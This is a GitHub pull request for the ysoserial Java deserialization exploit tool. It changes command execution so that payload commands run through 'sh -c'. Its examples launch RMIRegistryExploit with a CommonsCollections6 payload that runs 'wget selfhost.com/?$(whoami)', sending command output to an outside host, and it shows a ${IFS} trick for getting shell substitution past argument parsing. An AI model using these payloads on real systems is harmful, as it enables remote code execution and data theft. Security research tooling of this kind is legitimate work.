change Runtime exec(String) to exec(String[]) #60
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Java Runtime.getRuntime().exec(String cmd) is not a shell environment. It could not use cmd like "echo$(whoami)" which $ (whoami) would be executed.
Runtime.getRuntime().exec("echo $(whoami)");
will print out : $(whoami)
but not : root
But we could make the
String cmd
in a shell environment like thisString[] cmd_arr = {"sh", "-c", "echo $(whoami)"};
Runtime.getRuntime().exec(String[] cmd_arr);
will print out : root
Or we could make StringTokenizer work appropriately that Runtime.getRuntime().exec use it to parse
String cmd
. A little ugly cmd like thisRuntime.getRuntime().exec("bash -c echo${IFS}$(whoami)");
will print out: root
So I change execArgs and exec parameters to make
String command
into a shell environment. After doing this, user could usejava -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections6 'wget selfhost.com/?$(whoami)'
instead of
java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections6 'bash -c wget${IFS}selfhost.com/?$(whoami)'